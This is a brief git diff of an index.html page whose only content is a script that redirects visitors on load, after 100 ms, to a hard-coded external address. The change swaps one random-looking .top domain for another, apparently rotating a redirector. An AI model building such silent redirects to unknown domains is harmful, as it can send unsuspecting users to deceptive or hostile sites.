--- a/index.html
+++ b/index.html
@@ -9,8 +9,9 @@
 </head>
 <body>
   <script>
-  window.page = 'https://gugjusafkn.top/';
+  window.page = 'https://youdaofnagui.top/';
   setTimeout(() => location.href=window.page, 100);
   </script>
 </body>
 </html>
+
